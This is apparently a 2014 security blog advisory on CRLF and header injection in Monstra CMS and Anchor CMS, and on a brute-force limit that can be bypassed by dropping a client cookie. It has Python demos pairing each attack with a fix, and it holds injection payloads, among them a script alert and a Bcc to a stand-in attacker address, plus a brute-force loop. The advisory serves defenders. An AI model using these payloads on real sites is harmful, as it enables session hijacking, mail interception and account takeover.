Saturday, November 15, 2014

Posted by Paulos Yibelo, 2:07 AM

Monstra CMS 3.0.1 and below (current version at the time of writing): Vulnerabilities

HTTP Response Splitting (CRLF Injection)

SetCookie("cryptcookietest", "1");
... ?>

So providing a value that uses %0A%0D%0A%0D to terminate the cookie header would result in a CRLF injection: the attacker can add arbitrary headers to the response. This can be used for reflected XSS, content spoofing, open redirection, and more.

Note: the PHP version must still allow multiple headers to be sent in one call; this was fixed in PHP 5.1.2 and later, which reject newlines in header values.
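As an added example (not Monstra's code), the following Python simulates a server that copies a request-controlled value into Set-Cookie, parses the resulting response the way a browser would, and shows the check that a hardened version needs. The payload uses the standard CR LF order (%0d%0a) and the cookie name from the snippet above; the server and parser are assumptions for illustration.

```python
from urllib.parse import unquote

CRLF = "\r\n"


def build_response_unsafe(cookie_name, cookie_value):
    # Mimics a server that copies an attacker-controlled value into Set-Cookie
    # without checking for CR/LF (the behaviour the advisory describes).
    return (
        "HTTP/1.1 200 OK" + CRLF
        + "Content-Type: text/html" + CRLF
        + "Set-Cookie: " + cookie_name + "=" + cookie_value + CRLF
        + CRLF
        + "<html>original body</html>"
    )


def parse_response(raw):
    # Minimal response parser: the header block ends at the first blank line,
    # so anything the attacker appends after CRLF CRLF becomes the body.
    head, _, body = raw.partition(CRLF + CRLF)
    headers = {}
    for line in head.split(CRLF)[1:]:  # skip the status line
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers, body


def is_safe_header_value(value):
    # The check that makes a header value safe to emit: no CR or LF at all.
    return "\r" not in value and "\n" not in value


def build_response_safe(cookie_name, cookie_value):
    # Hardened version: refuse the value instead of splitting the response.
    if not is_safe_header_value(cookie_value):
        raise ValueError("CR/LF in header value")
    return build_response_unsafe(cookie_name, cookie_value)


# Constructed payload, URL-encoded as it would travel in a query string:
# appends a second Set-Cookie, ends the header block early, and supplies a body.
PAYLOAD = "1%0d%0aSet-Cookie:%20session=attacker%0d%0a%0d%0a<script>alert(1)</script>"


def demo_unsafe():
    headers, body = parse_response(
        build_response_unsafe("cryptcookietest", unquote(PAYLOAD)))
    return headers.get("set-cookie"), body


def demo_safe():
    try:
        build_response_safe("cryptcookietest", unquote(PAYLOAD))
    except ValueError:
        return "rejected"
    return "accepted"


if __name__ == "__main__":
    print(demo_unsafe())
    print(demo_safe())
```

The unsafe build yields two Set-Cookie headers and an attacker-supplied body, which is exactly the reflected-XSS and content-spoofing outcome described above; the safe build raises before anything is sent.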

Bruteforce Mitigation Bypass [CVE-2014-9006]


// Admin login
if (Request::post('login_submit')) {

    if (Cookie::get('login_attempts') && Cookie::get('login_attempts') >= 5) {

        $login_error = __('You are banned for 10 minutes. Try again later', 'users');

    } else {

        $user = $users->select("[login='" . trim(Request::post('login')) . "']", null);

The code blocks brute-force attempts simply by placing a cookie called
"login_attempts" in the client's browser. Because the counter lives on the client,
an attacker can craft a brute-force script that either clears cookies between
requests or does not send cookies at all, and the limit is never reached.
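As an added example (not Monstra's code), the Python below models the cookie-based counter from the snippet above next to a server-side counter keyed by login name, and runs the same attacker script against both. The wordlist, login name and limit of five attempts are constructed for the demonstration; the limiter classes are assumptions, not Monstra's implementation.

```python
MAX_ATTEMPTS = 5


class CookieLimiter:
    # Reproduces the weak check: the failure counter lives in the client's
    # cookies, so whatever the client sends (or omits) is trusted.
    def attempt(self, cookies, password_ok):
        attempts = int(cookies.get("login_attempts", "0"))
        if attempts >= MAX_ATTEMPTS:
            return "banned", cookies
        new_cookies = dict(cookies)
        if password_ok:
            return "success", new_cookies
        new_cookies["login_attempts"] = str(attempts + 1)
        return "failed", new_cookies


class ServerLimiter:
    # Hardened version: the counter is kept server-side, keyed by the login
    # name, so the client cannot reset it by dropping cookies.
    def __init__(self):
        self.failures = {}

    def attempt(self, login, password_ok):
        if self.failures.get(login, 0) >= MAX_ATTEMPTS:
            return "banned"
        if password_ok:
            self.failures.pop(login, None)
            return "success"
        self.failures[login] = self.failures.get(login, 0) + 1
        return "failed"


# Constructed sample inputs: a small wordlist with the real password 12th.
WORDLIST = ["123456", "password", "letmein", "qwerty", "admin", "monstra",
            "welcome", "iloveyou", "secret", "dragon", "master", "hunter2",
            "sunshine"]
REAL_PASSWORD = "hunter2"


def bruteforce_cookie_limited(send_cookies):
    # Attacker script against the cookie-based limiter. With send_cookies=False
    # the script simply never returns the counter cookie to the server.
    limiter = CookieLimiter()
    jar = {}
    for tried, guess in enumerate(WORDLIST, start=1):
        status, jar = limiter.attempt(jar if send_cookies else {},
                                      guess == REAL_PASSWORD)
        if status != "failed":
            return status, tried
    return "exhausted", len(WORDLIST)


def bruteforce_server_limited():
    # Same script against the server-side limiter: cookies are irrelevant.
    limiter = ServerLimiter()
    for tried, guess in enumerate(WORDLIST, start=1):
        status = limiter.attempt("admin", guess == REAL_PASSWORD)
        if status != "failed":
            return status, tried
    return "exhausted", len(WORDLIST)


if __name__ == "__main__":
    print(bruteforce_cookie_limited(send_cookies=True))
    print(bruteforce_cookie_limited(send_cookies=False))
    print(bruteforce_server_limited())
```

A well-behaved client is banned on the sixth attempt, the cookie-dropping client walks the whole wordlist, and the server-side counter bans the sixth attempt regardless of what the client sends. A lock keyed only by login name lets an attacker lock out legitimate users, so a real deployment should also expire the lock (the message above says 10 minutes) and combine it with per-IP throttling.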

Anchor CMS <= 0.9.2 Header Injection [CVE-2014-9182]

Anchor CMS versions 0.9.2 and below suffer from a header injection vulnerability.

In anchor/models/comment.php:

$headers  = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=utf-8' . "\r\n";
$headers .= 'From: notifications@' . $_SERVER['HTTP_HOST'] . "\r\n";
mail($to, __('comments.notify_subject'), $message, $headers);
 ...  ?>

$_SERVER['HTTP_HOST'] is taken from the request's Host header, so it is possible to inject an arbitrary "From" header, or any other header, using CRLF, simply by tampering with the Host header and changing it to or\r\nNew-Header:Hacked!
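As an added example (not Anchor's code), the Python below builds the same header block by concatenation, parses it as a mail library or MTA would to show the injected header, and contrasts it with a version that only accepts a Host value from a configured allowlist. The hostname, the allowlist and the Bcc payload are constructed for the demonstration; the port-stripping assumes no IPv6 literal in the Host header.

```python
from email.parser import HeaderParser

# Assumed deployment hostname(s); in a real application this comes from
# configuration, never from the request.
ALLOWED_HOSTS = {"blog.example.com"}


def build_headers_unsafe(http_host):
    # Mirrors the concatenation in anchor/models/comment.php: the
    # request-controlled Host value goes straight into the From header.
    headers = "MIME-Version: 1.0\r\n"
    headers += "Content-type: text/html; charset=utf-8\r\n"
    headers += "From: notifications@" + http_host + "\r\n"
    return headers


def build_headers_safe(http_host):
    # Hardened version: drop an optional port, then require an allowlisted
    # hostname. Any CRLF payload fails the lookup, so no header is injected.
    host = http_host.split(":", 1)[0].lower()
    if host not in ALLOWED_HOSTS:
        raise ValueError("Host header not in allowlist: %r" % http_host)
    return build_headers_unsafe(host)


def parse_mail_headers(raw):
    # Parse the header block the way the mail side will see it.
    msg = HeaderParser().parsestr(raw)
    return dict(msg.items())


# Constructed malicious Host header: terminates the From line and adds a Bcc,
# so every comment notification is silently copied to the attacker.
EVIL_HOST = "blog.example.com\r\nBcc: attacker@evil.example"


def demo_unsafe():
    return parse_mail_headers(build_headers_unsafe(EVIL_HOST))


def demo_safe():
    try:
        build_headers_safe(EVIL_HOST)
    except ValueError:
        return "rejected"
    return "accepted"


if __name__ == "__main__":
    print(demo_unsafe())
    print(demo_safe())
    print(build_headers_safe("blog.example.com:8080"))
```

With the unsafe build the parsed headers contain a Bcc the application never wrote; the allowlisted build rejects the payload while still accepting the legitimate host with a port suffix.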
